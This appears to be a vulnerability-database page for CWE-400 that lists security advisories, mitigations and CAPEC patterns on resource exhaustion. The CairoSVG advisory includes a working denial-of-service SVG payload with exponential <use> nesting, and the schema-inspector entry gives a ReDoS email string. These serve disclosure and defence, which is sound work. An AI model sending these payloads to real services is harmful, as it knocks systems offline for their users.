CWE-400
DiscouragedUncontrolled Resource Consumption
Abstraction: Class · Status: Draft
The product does not properly control the allocation and maintenance of a limited resource.
5412 vulnerabilities reference this CWE, most recent first.
GHSA-F38F-5XPM-9R7C
Vulnerability from github – Published: 2026-03-13 18:57 – Updated: 2026-04-15 21:09Summary
Kozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive <use> element amplification in cairosvg/defs.py (line ~335). This causes CPU exhaustion from a small input.
Severity
High — CVSS 3.1: 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Vulnerable Code
File: cairosvg/defs.py (line ~335), function use()
The use() function recursively processes <use> elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.
Impact
- 1,411-byte SVG payload pins CPU at 100% indefinitely
- Memory stays flat at ~43MB — no OOM kill, process never terminates
- Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able
- Amplification factor: O(10^N) rendering calls from O(N) input
Proof of Concept
Save as poc.svg and run timeout 10 cairosvg poc.svg -o test.png:
<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<g id="a"><rect width="1" height="1"/></g>
<g id="b"><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/><use xlink:href="#a"/></g>
<g id="c"><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/><use xlink:href="#b"/></g>
<g id="d"><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/><use xlink:href="#c"/></g>
<g id="e"><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/><use xlink:href="#d"/></g>
</defs>
<use xlink:href="#e"/>
</svg>
Expected: timeout kills the process after 10 seconds (it never completes on its own).
Alternatively test with Python:
import cairosvg, signal
signal.alarm(5) # Kill after 5 seconds
try:
cairosvg.svg2png(bytestring=open("poc.svg").read())
except:
print("[!!!] CONFIRMED: CPU exhaustion — process did not complete in 5s")
Suggested Fix
Add recursion depth counter to use() function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.
References
Credit
Kai Aizen (SnailSploit) — Adversarial AI & Security Research
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.8.2"
},
"package": {
"ecosystem": "PyPI",
"name": "CairoSVG"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.9.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-31899"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T18:57:31Z",
"nvd_published_at": "2026-03-13T19:54:38Z",
"severity": "HIGH"
},
"details": "## Summary\n\nKozea/CairoSVG (~300K downloads/week) has exponential denial of service via recursive `\u003cuse\u003e` element amplification in `cairosvg/defs.py` (line ~335). This causes CPU exhaustion from a small input.\n\n## Severity\n\nHigh \u2014 CVSS 3.1: 7.5\nVector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`\n\n## Vulnerable Code\n\nFile: `cairosvg/defs.py` (line ~335), function `use()`\n\nThe `use()` function recursively processes `\u003cuse\u003e` elements without any depth or count limits. With 5 levels of nesting and 10 references each, a 1,411-byte SVG triggers 10^5 = 100,000 render calls.\n\n## Impact\n\n- 1,411-byte SVG payload pins CPU at 100% indefinitely\n- Memory stays flat at ~43MB \u2014 no OOM kill, process never terminates\n- Any service accepting SVG input (thumbnailing, PDF generation, avatar rendering) is DoS-able\n- Amplification factor: O(10^N) rendering calls from O(N) input\n\n## Proof of Concept\n\nSave as `poc.svg` and run `timeout 10 cairosvg poc.svg -o test.png`:\n\n```xml\n\u003c?xml version=\"1.0\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\"\u003e\n \u003cdefs\u003e\n \u003cg id=\"a\"\u003e\u003crect width=\"1\" height=\"1\"/\u003e\u003c/g\u003e\n \u003cg id=\"b\"\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003cuse xlink:href=\"#a\"/\u003e\u003c/g\u003e\n \u003cg id=\"c\"\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003cuse xlink:href=\"#b\"/\u003e\u003c/g\u003e\n \u003cg id=\"d\"\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003cuse xlink:href=\"#c\"/\u003e\u003c/g\u003e\n \u003cg id=\"e\"\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003cuse xlink:href=\"#d\"/\u003e\u003c/g\u003e\n \u003c/defs\u003e\n \u003cuse xlink:href=\"#e\"/\u003e\n\u003c/svg\u003e\n```\n\nExpected: `timeout` kills the process after 10 seconds (it never completes on its own).\n\nAlternatively test with Python:\n```python\nimport cairosvg, signal\nsignal.alarm(5) # Kill after 5 seconds\ntry:\n cairosvg.svg2png(bytestring=open(\"poc.svg\").read())\nexcept:\n print(\"[!!!] CONFIRMED: CPU exhaustion \u2014 process did not complete in 5s\")\n```\n\n## Suggested Fix\n\nAdd recursion depth counter to `use()` function. Cap at e.g. 10 levels. Also add total element budget to prevent amplification.\n\n## References\n\n- [CWE-400](https://cwe.mitre.org/data/definitions/400.html)\n\n## Credit\n\nKai Aizen (SnailSploit) \u2014 Adversarial AI \u0026 Security Research",
"id": "GHSA-f38f-5xpm-9r7c",
"modified": "2026-04-15T21:09:46Z",
"published": "2026-03-13T18:57:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/security/advisories/GHSA-f38f-5xpm-9r7c"
},
{
"type": "WEB",
"url": "https://github.com/Kozea/CairoSVG/commit/6dde8685ed3f19837767bce7a13a5491e3d0e0bf"
},
{
"type": "PACKAGE",
"url": "https://github.com/Kozea/CairoSVG"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "CairoSVG vulnerable to Exponential DoS via recursive \u003cuse\u003e element amplification"
}
GHSA-F38P-C2GQ-4PMR
Vulnerability from github – Published: 2021-03-19 20:14 – Updated: 2022-07-05 18:05Impact
What kind of vulnerability is it? Who is impacted?
Email address validation is vulnerable to a denial-of-service attack where some input (for example a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected.
Patches
Has the problem been patched? What versions should users upgrade to? Users should upgrade to version 2.0.0, which uses a regex expression that isn't vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading? If a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a "not yet validated" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways.
References
Are there any links users can visit to find out more? https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f
For more information
If you have any questions or comments about this advisory, you can create an issue in this repository.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "schema-inspector"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-21267"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-19T20:14:08Z",
"nvd_published_at": "2021-03-19T21:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nEmail address validation is vulnerable to a denial-of-service attack where some input (for example `a@0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.`) will freeze the program or web browser page executing the code. This affects any current schema-inspector users using any version to validate email addresses. Users who do not do email validation, and instead do other types of validation (like string min or max length, etc), are not affected.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\nUsers should upgrade to version 2.0.0, which uses a regex expression that isn\u0027t vulnerable to ReDoS. The new regex expression is more limited in what it can check, so it is more flexible than the one used before. Therefore, this was a new major version instead of a new patch version to warn people upgrading that they should make sure the email validation still works for their use case. \n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\nIf a user chooses to not upgrade, the only known workaround would be to stop using the email validation feature in the library. The user could, for example, accept the email address into their system but save it in a \"not yet validated\" state in their system until a verification email is sent to it (to determine whether the email is valid and belongs to the form submitter). Note that this is the preferred way of validating email addresses anyways.\n\n### References\n_Are there any links users can visit to find out more?_\nhttps://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f\n\n### For more information\nIf you have any questions or comments about this advisory, you can create an issue in this repository.",
"id": "GHSA-f38p-c2gq-4pmr",
"modified": "2022-07-05T18:05:18Z",
"published": "2021-03-19T20:14:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/schema-inspector/schema-inspector/security/advisories/GHSA-f38p-c2gq-4pmr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21267"
},
{
"type": "WEB",
"url": "https://gist.github.com/mattwelke/b7f42424680a57b8161794ad1737cd8f"
},
{
"type": "WEB",
"url": "https://github.com/schema-inspector/schema-inspector/releases/tag/2.0.0"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20210528-0006"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/package/schema-inspector"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Regular Expression Denial-of-Service in npm schema-inspector"
}
GHSA-F392-JC49-593J
Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43Trend Micro's Virus Scan API (VSAPI) and Advanced Threat Scan Engine (ATSE) - are vulnerable to a memory exhaustion vulnerability that may lead to denial-of-service or system freeze if exploited by an attacker using a specially crafted file.
{
"affected": [],
"aliases": [
"CVE-2021-25252"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-03T16:15:00Z",
"severity": "MODERATE"
},
"details": "Trend Micro\u0027s Virus Scan API (VSAPI) and Advanced Threat Scan Engine (ATSE) - are vulnerable to a memory exhaustion vulnerability that may lead to denial-of-service or system freeze if exploited by an attacker using a specially crafted file.",
"id": "GHSA-f392-jc49-593j",
"modified": "2022-05-24T17:43:35Z",
"published": "2022-05-24T17:43:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25252"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/solution/000285675"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F39X-GX7X-WWFJ
Vulnerability from github – Published: 2024-02-12 09:31 – Updated: 2024-02-14 18:30Processing of user-defined mail search expressions is not limited. Availability of OX App Suite could be reduced due to high processing load. Please deploy the provided updates and patch releases. Processing time of mail search expressions now gets monitored, and the related request is terminated if a resource threshold is reached. No publicly available exploits are known.
{
"affected": [],
"aliases": [
"CVE-2023-41707"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-12T09:15:11Z",
"severity": "MODERATE"
},
"details": "Processing of user-defined mail search expressions is not limited. Availability of OX App Suite could be reduced due to high processing load. Please deploy the provided updates and patch releases. Processing time of mail search expressions now gets monitored, and the related request is terminated if a resource threshold is reached.\n No publicly available exploits are known.",
"id": "GHSA-f39x-gx7x-wwfj",
"modified": "2024-02-14T18:30:24Z",
"published": "2024-02-12T09:31:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41707"
},
{
"type": "WEB",
"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2023/oxas-adv-2023-0007.json"
},
{
"type": "WEB",
"url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6259_7.10.6_2023-12-11.pdf"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/177130/OX-App-Suite-7.10.6-Cross-Site-Scirpting-Denial-Of-Service.html"
},
{
"type": "WEB",
"url": "http://seclists.org/fulldisclosure/2024/Feb/10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F3G2-HMGR-Q2MJ
Vulnerability from github – Published: 2024-04-09 03:30 – Updated: 2024-09-29 00:30The ABAP Application Server of SAP NetWeaver as well as ABAP Platform allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. This leads to a considerable impact on availability.
{
"affected": [],
"aliases": [
"CVE-2024-30218"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-605"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-09T01:15:50Z",
"severity": "MODERATE"
},
"details": "The ABAP Application Server of SAP NetWeaver as well as ABAP Platform\u00a0allows an attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service. This leads to a considerable impact on availability.\n\n",
"id": "GHSA-f3g2-hmgr-q2mj",
"modified": "2024-09-29T00:30:57Z",
"published": "2024-04-09T03:30:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30218"
},
{
"type": "WEB",
"url": "https://me.sap.com/notes/3359778"
},
{
"type": "WEB",
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F3HF-R62C-MFRJ
Vulnerability from github – Published: 2025-09-12 21:32 – Updated: 2025-09-15 13:46Liferay Portal 7.4.0 through 7.4.3.101, and Liferay DXP 2023.Q3.0 through 2023.Q3.4, 7.4 GA through update 92 and 7.3 GA though update 35 does not limit the number of objects returned from a GraphQL queries, which allows remote attackers to perform denial-of-service (DoS) attacks on the application by executing queries that return a large number of objects.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay:com.liferay.portal.vulcan.api"
},
"ranges": [
{
"events": [
{
"introduced": "8.0.2"
},
{
"fixed": "40.2.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "com.liferay:com.liferay.portal.vulcan.impl"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.7"
},
{
"fixed": "5.0.105"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-43796"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-15T13:46:24Z",
"nvd_published_at": "2025-09-12T20:15:42Z",
"severity": "HIGH"
},
"details": "Liferay Portal 7.4.0 through 7.4.3.101, and Liferay DXP 2023.Q3.0 through 2023.Q3.4, 7.4 GA through update 92 and 7.3 GA though update 35 does not limit the number of objects returned from a GraphQL queries, which allows remote attackers to perform denial-of-service (DoS) attacks on the application by executing queries that return a large number of objects.",
"id": "GHSA-f3hf-r62c-mfrj",
"modified": "2025-09-15T13:46:24Z",
"published": "2025-09-12T21:32:14Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43796"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/2e4adf041e31f3474a14c29b7c135693f6529400"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/2f74f23982fb03238f9b4ae145c33a9c1084f07e"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/3780804b0d8f4f14bfca470a3e2e662bc6cef588"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/8344aec3bebcd2ca409794523d5db5be6047c3dd"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/83e77963499d4d3e7cc82cc48e63c992f6f29a6d"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal/commit/8dda4adc0e9e7b6f82d4b3959592cad61640309b"
},
{
"type": "WEB",
"url": "https://github.com/liferay/liferay-portal"
},
{
"type": "WEB",
"url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43796"
},
{
"type": "WEB",
"url": "http://github.com/liferay/liferay-portal/commit/8f7eb98e05a5ea6961346ecc21fd73e4b46bba99"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Liferay Portal: Missing Rate Limiting in GraphQL Endpoint Enables Resource Exhaustion Attack"
}
GHSA-F3PM-M5M9-45GW
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-08-11 00:00A flaw was found in spice in versions before 0.14.92. A DoS tool might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection.
{
"affected": [],
"aliases": [
"CVE-2021-20201"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-05-28T11:15:00Z",
"severity": "HIGH"
},
"details": "A flaw was found in spice in versions before 0.14.92. A DoS tool might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection.",
"id": "GHSA-f3pm-m5m9-45gw",
"modified": "2022-08-11T00:00:29Z",
"published": "2022-05-24T19:03:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20201"
},
{
"type": "WEB",
"url": "https://blog.qualys.com/product-tech/2011/10/31/tls-renegotiation-and-denial-of-service-attacks"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921846"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-F3QJ-WR66-G552
Vulnerability from github – Published: 2026-06-03 00:30 – Updated: 2026-06-03 21:30Dräger Core 1.0.5 and Dräger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed.
{
"affected": [],
"aliases": [
"CVE-2024-14036"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-02T22:16:15Z",
"severity": "HIGH"
},
"details": "Dr\u00e4ger Core 1.0.5 and Dr\u00e4ger M540 Converter Service 1.0.9 contain a denial of service vulnerability that allows network-adjacent attackers to trigger high CPU load by sending specially crafted, unencrypted SDC messages during the discovery process. Attackers with access to the hospital network can send malformed SDC packets to exhaust CPU resources in the affected process, causing further SDC messages to no longer be processed.",
"id": "GHSA-f3qj-wr66-g552",
"modified": "2026-06-03T21:30:28Z",
"published": "2026-06-03T00:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-14036"
},
{
"type": "WEB",
"url": "https://static.draeger.com/security"
},
{
"type": "WEB",
"url": "https://static.draeger.com/security/download/PSA-24-110-1-gSOAP-Product-Security-Advisory.pdf"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/dr-ger-core-denial-of-service-via-malformed-sdc-message"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-F3X9-2XRG-95G2
Vulnerability from github – Published: 2022-05-01 18:26 – Updated: 2022-05-01 18:26Stack consumption vulnerability in AkkyWareHOUSE 7-zip32.dll before 4.42.00.04, as derived from Igor Pavlov 7-Zip before 4.53 beta, allows user-assisted remote attackers to execute arbitrary code via a long filename in an archive, leading to a heap-based buffer overflow.
{
"affected": [],
"aliases": [
"CVE-2007-4725"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2007-09-05T19:17:00Z",
"severity": "MODERATE"
},
"details": "Stack consumption vulnerability in AkkyWareHOUSE 7-zip32.dll before 4.42.00.04, as derived from Igor Pavlov 7-Zip before 4.53 beta, allows user-assisted remote attackers to execute arbitrary code via a long filename in an archive, leading to a heap-based buffer overflow.",
"id": "GHSA-f3x9-2xrg-95g2",
"modified": "2022-05-01T18:26:30Z",
"published": "2022-05-01T18:26:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2007-4725"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36459"
},
{
"type": "WEB",
"url": "http://akky.cjb.net/security/7-zip3.txt"
},
{
"type": "WEB",
"url": "http://jvn.jp/jp/JVN%2362868899/index.html"
},
{
"type": "WEB",
"url": "http://osvdb.org/40482"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/26624"
},
{
"type": "WEB",
"url": "http://sourceforge.net/project/shownotes.php?release_id=535160\u0026group_id=14481"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/25545"
},
{
"type": "WEB",
"url": "http://www.vupen.com/english/advisories/2007/3086"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-F42H-PJ3V-GMW8
Vulnerability from github – Published: 2024-12-09 15:31 – Updated: 2024-12-09 15:31Dell PowerScale OneFS Versions 9.5.0.x through 9.8.0.x contain an uncontrolled resource consumption vulnerability. A low privilege remote attacker could potentially exploit this vulnerability, leading to denial of service.
{
"affected": [],
"aliases": [
"CVE-2024-42426"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-09T15:15:15Z",
"severity": "MODERATE"
},
"details": "Dell PowerScale OneFS Versions 9.5.0.x through 9.8.0.x contain an uncontrolled resource consumption vulnerability. A low privilege remote attacker could potentially exploit this vulnerability, leading to denial of service.",
"id": "GHSA-f42h-pj3v-gmw8",
"modified": "2024-12-09T15:31:37Z",
"published": "2024-12-09T15:31:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42426"
},
{
"type": "WEB",
"url": "https://www.dell.com/support/kbdoc/en-in/000256645/dsa-2024-453-security-update-for-dell-powerscale-onefs-multiple-security-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
]
}
Mitigation
Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.
Mitigation
- Mitigation of resource exhaustion attacks requires that the target system either:
- The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
- The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
- recognizes the attack and denies that user further access for a given amount of time, or
- uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Ensure that protocols have specific limits of scale placed on them.
Mitigation
Ensure that all failures in resource allocation place the system into a safe posture.
CAPEC-147: XML Ping of the Death
An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.
CAPEC-227: Sustained Client Engagement
An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.
CAPEC-492: Regular Expression Exponential Blowup
An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.